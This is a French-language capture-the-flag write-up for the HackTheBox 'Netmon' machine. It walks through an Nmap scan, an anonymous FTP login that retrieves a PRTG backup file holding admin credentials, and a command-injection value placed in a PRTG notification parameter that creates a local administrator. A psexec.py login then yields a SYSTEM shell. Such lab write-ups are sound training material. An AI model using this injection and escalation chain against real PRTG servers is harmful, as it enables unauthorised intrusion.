Seyptoo hacks stuff

HackTheBox - Netmon

Flower

Informations

Ip :  10.10.10.152      Created by : mrb3n
Level : Easy    Base Points : 20

Résumé :

Le système Netmon, disponible sur la platforme HackTheBox, fut très intéressant et amusante. La boîte était relativement simple. De plus, j’ai appris beaucoup de chose tout au long de l’exploitation des failles de ce système.

Nmap

Starting Nmap 7.01 ( https://nmap.org ) at 2019-06-29 17:21 CEST
Nmap scan report for 10.10.10.152
Host is up (0.040s latency).
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_06-29-19  11:07AM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds
Service Info: OSs: Windows, Windows 98, Windows Server 2008 R2; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.61 seconds

Il y’a différent services d’ouvert notamment le service FTP ou nous avons les permissions pour se connecter en tant que anonymous.

FTP

root@Seyptoo:~/htb/box/Netmon# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
06-29-19  11:07AM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> mget user.txt
mget user.txt? y
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.03 secs (0.9522 kB/s)
ftp> exit
root@Seyptoo:~/htb/box/Netmon# wc -c user.txt 
33 user.txt

Le fichier user.txt est disponible et nous pouvons le transférer vers notre machine physique.

PRTG ADMIN

D’après le scan et également d’après mes recherches le service tourne dans le dossier ProgramData.

ftp> cd ProgramData
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
06-29-19  11:11AM       <DIR>          PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:40AM       <DIR>          Configuration Auto-Backups
06-29-19  10:29AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-29-19  10:29AM       <DIR>          Logs (Web Server)
06-29-19  10:34AM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
06-29-19  10:58AM              1292772 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-29-19  11:11AM              1548431 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.

Nous avons des fichiers plutôt interéssant notamment le fichier backup PRTG Configuration.old.bak, nous allons transférer ce fichier vers notre machique physique pour énumérer ce fichier. Quand nous défilons un peu, on peut constater des informations d’identification dans le système PRTG Network Monitor.

<dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
</dbpassword>

Donc si vous tentez d’accéder au service, logiquement vous aurez pas accès car le mot de passe correspond celui là de 2018, et comme nous avons changer de génération c’est 2019. (J’ai mis pas mal de temps à comprendre).

HTTP

Donc nous avons les informations d’identification nous pouvons nous connecter dans le service en question et d’éxecuter des commandes.

Username : prtgadmin
Password : PrTg@dmin2019

Flower

Une fois connecté au service nous allons allez dans Setup et ensuite notifications. Créé une nouvelle notification et ensuite d’aller dans Execute Program pour justement exécuter des commandes. Je vais créé un utilisateur qui serais dans le groupe administrators.

test.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add

Vous devez mettre les informations dans la section Parameter et de mettre les informations pour créé notre utilisateur comme administrateur.

Flower

Vous enregistrez la notification et ensuite vous cliquez sur la petite cloche et normalement votre commande a été exécuter avec succès. Vous devriez un peu patienter pour que la commande sois exécuter avec certitude.

Flower

PrivEsc

Une fois toute les modifications ont été effectué vous vous connectez avec psexec.py dans le système pour être administrateur. Vous pouvez également utilisé smbclient.

root@Seyptoo:~/htb/box/Netmon# psexec.py 'anon:p3nT3st!@10.10.10.152'
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file tbwyLJgn.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service PdOp on 10.10.10.152.....
[*] Starting service PdOp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

CONCLUSION

Voilà, nous arrivons enfin au bout de cet article qui, je l’espère, vous aura plus. Une boîte vraiment intéréssante et concrètement assez originale, une boîte relativement simple.